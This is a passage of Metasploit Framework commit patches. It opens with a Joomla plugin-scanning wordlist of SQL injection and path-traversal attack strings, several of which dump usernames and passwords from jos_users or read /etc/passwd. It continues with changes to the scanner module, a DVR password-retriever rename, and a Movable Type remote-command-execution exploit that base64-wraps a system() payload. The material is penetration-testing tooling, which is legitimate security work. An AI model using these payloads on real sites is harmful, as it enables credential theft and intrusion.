+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] +index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= +index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= +index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' +index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube +index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 37bfc3d17309..7b497d1846b9 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -2,7 +2,7 @@ # $Id: joomla_vulnscan.rb ## ## -#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,30 +21,30 @@ def initialize super( 'Name' => 'Joomla Scanner', 'Description' => %q{ - This module scans a Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information, plugins and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE ) - register_options( + register_options( [ - OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") ] ) ], self.class) end - def osfingerprint (response) + def osfingerprint(response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" + os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end @@ -52,8 +52,7 @@ def osfingerprint (response) return os end - def fingerprint (response, app) - + def fingerprint(response, app) if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -87,58 +86,65 @@ def fingerprint (response, app) return out end - def run_host (ip) - tpath = datastore['PATH'] - if tpath[-1,1] != '/' + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' tpath += '/' - end - apps = [ 'language/en-GB/en-GB.xml', + end + apps = [ 'languaage/en-GB/en-GB.xml', 'templates/system/css/system.css', 'media/system/js/mootools-more.js', 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form', + iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - print_status("Checking Host: #{ip} for version information") + apps.each do |app| - break if check_app(tpath,app,ip) + app_status = check_app(tpath, app, ip) + return if app_status == :abort + break if app_status end - print_status("Scanning #{ip} for interesting pages") + vprint_status("#{peer} - Checking host for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning #{ip} for plugins") + vprint_status("#{peer} - Checking host for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return if not bres or not bres.body or not bres.code + return false if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end end - end - def check_app (tpath, app, ip) + def check_app(tpath, app, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << app, + 'uri' => "#{tpath}" << app, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return :abort if res.nil? + return false if not res or not res.body or not res.code + vprint_status("#{peer} - Checking host for version information") res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) - if (res.code.to_i == 200) + if (res.code == 200) out = fingerprint(res,app) return if not out if(out =~ /Unknown Joomla/) - print_error("Unable to identify Joomla Version with this file #{app}") + print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") return false else - print_good("Joomla Version:#{out} from: #{app} ") - print_good("OS: #{os}") + print_good("#{peer} - Joomla Version:#{out} from: #{app} ") + print_good("#{peer} - OS: #{os}") report_note( :host => ip, :port => datastore['RPORT'], @@ -146,44 +152,50 @@ def check_app (tpath, app, ip) :ntype => 'Joomla Version', :data => out ) - return true + return :next_app end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def scan_pages (tpath, iapp, ip) + def scan_pages(tpath, iapp, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << iapp, + 'uri' => "#{tpath}" << iapp, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return false if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') - if (res.code.to_i == 200) + if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "Administrator Login Page" + sout = "**Administrator Login Page" elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) - sout = "Registration Page" + sout = "**Registration Page" else - sout = iapp + sout = iapp end return if not sout if(sout == iapp) - print_good("#{iapp}") - elsif print_good("#{sout}: #{iapp} ") + print_good("#{peer} - Page: #{tpath}#{iapp}") + elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") report_note( :host => ip, :port => datastore['RPORT'], @@ -192,58 +204,64 @@ def scan_pages (tpath, iapp, ip) :data => sout ) end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def plugin_search (tpath, papp, ip, bres) + def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << papp, + 'uri' => "#{tpath}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size nsize = res.body.size - if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("Found Plugin: #{papp} ") + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("Passwd not found") + vprint_error("#{peer} - Vulnerability: LFI not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("Passwd file found in response") + print_good("#{peer} - Vulnerability: Potential LFI") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("Unable to identify SQL injection") + vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("No XSS") + vprint_error("#{peer} - Vulnerability: No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("Possible XSS") + print_good("#{peer} - Vulnerability: Potential XSS") elsif(res.body =~/SQL syntax/ ) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/com_/) vars = papp.split('_') pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", + 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) - if (res1.code.to_i == 200) - print_good("Found Page: index.php?option=com_#{pages}") + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") else - print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") + vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end end report_note( @@ -253,21 +271,27 @@ def plugin_search (tpath, papp, ip, bres) :ntype => 'Plugin Found', :data => papp ) - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} ip access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end From 2c12666f4e3359802cbf9593d7ad9e7b128c5e40 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 21:10:05 -0600 Subject: [PATCH 140/421] Update the vendor to match the OEM source --- modules/auxiliary/scanner/misc/swann_dvr_passwords.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb index 559e439b6a4f..af08f4d8c0c0 100644 --- a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb @@ -16,13 +16,13 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Swann DVR Password Retriever', + 'Name' => 'Ray Sharp DVR Password Retriever', 'Description' => %q{ This module takes advantage of a protocol design issue with the - Swann DVR systems. It is possible to retrieve the username and - password through the TCP service running on port 9000. Other - brand DVRs with the same issue may include Lorex, Night Owl, Zmodo - URMET, and KGuard Security. + Ray Sharp based DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other brands using + this platform and exposing the same issue may include Swann, Lorex, + Night Owl, Zmodo, URMET, and KGuard Security. }, 'Author' => [ From 8e0924770303da7c738e7ef82613db8289ac9ae0 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 21:10:25 -0600 Subject: [PATCH 141/421] Rename to match the OEM vendor --- .../misc/{swann_dvr_passwords.rb => raysharp_dvr_passwords.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/misc/{swann_dvr_passwords.rb => raysharp_dvr_passwords.rb} (100%) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb similarity index 100% rename from modules/auxiliary/scanner/misc/swann_dvr_passwords.rb rename to modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb From 0c0f4a3e66455b38c371958b446852ee7778139e Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 23:35:31 -0600 Subject: [PATCH 142/421] Lower ranking because they cannot auto-target In order to be qualified as ExcellentRanking, auto-target is a must, or the module has to default to a payload that's universal for multiple platforms. Otherwise you're wasting time in Pro. --- modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb | 2 +- modules/exploits/multi/http/jenkins_script_console.rb | 2 +- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index 107cb3dd29b5..f196e486192f 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 7d94d5640b87..bc195f03a921 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index f53da514dda0..4bf8cc5abdef 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 1c4bfc9e070f..1ff03167083a 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient From 3146b7ce77ceb294da9cc26958bb58221e237c03 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 23:40:47 -0600 Subject: [PATCH 143/421] Change default target ExcellentRanking requires the module to auto-target. If the payload is universal, that works too. --- .../exploits/multi/http/struts_code_exec_exception_delegator.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index caa7d8b2da98..f33f57bfb14a 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -64,7 +64,7 @@ def initialize(info = {}) ] ], 'DisclosureDate' => 'Jan 06 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 2)) register_options( [ From ba41ee9c83e993c5a6417e073eea2e7373b5dc16 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Thu, 24 Jan 2013 13:15:42 +0000 Subject: [PATCH 144/421] - applied all the changes from #1363 - some extra escaping for the sake of it - removed the timeout in http_send_raw --- .../multi/http/movabletype_upgrade_exec.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 43224ee2d784..96c4a846cb19 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -33,7 +33,7 @@ def initialize(info = {}) [ 'Kacper Nowak', 'Nick Blundell', - "Gary O'Leary-Steele" + 'Gary O\'Leary-Steele' ], 'References' => [ @@ -76,7 +76,7 @@ def check begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError - return + return Exploit::CheckCode::Unknown end if (res) if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) @@ -86,6 +86,8 @@ def check else return Exploit::CheckCode::Safe end + else + return Exploit::CheckCode::Unknown end end @@ -95,8 +97,9 @@ def exploit http_send_cmd(payload.encoded) end - def http_send_raw(cmd, timeout=20) + def http_send_raw(cmd) path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') send_request_cgi( { 'uri' => path, @@ -105,15 +108,15 @@ def http_send_raw(cmd, timeout=20) { '__mode' => 'run_actions', 'installing' => '1', - 'steps' => %{[["core_drop_meta_for_table","class","#{cmd.gsub('"', '\"')}"]]} + 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]} } - }, timeout) + }) end def http_send_cmd(cmd) pay = 'v0;use MIME::Base64;system(decode_base64(q(' pay << Rex::Text.encode_base64(cmd) pay << ')));return 0' - http_send_raw(pay, 0.5) + http_send_raw(pay) end end From bf2b01f8ef53c6d185b91b071a351943e4171e92 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 09:30:04 -0500 Subject: [PATCH 145/421] Delete a file and strip space --- data/wordlists/pcheck.txt | 627 ------------------ .../auxiliary/scanner/http/joomla_vulnscan.rb | 2 +- 2 files changed, 1 insertion(+), 628 deletions(-) delete mode 100755 data/wordlists/pcheck.txt diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt deleted file mode 100755 index b65dd2a422e2..000000000000 --- a/data/wordlists/pcheck.txt +++ 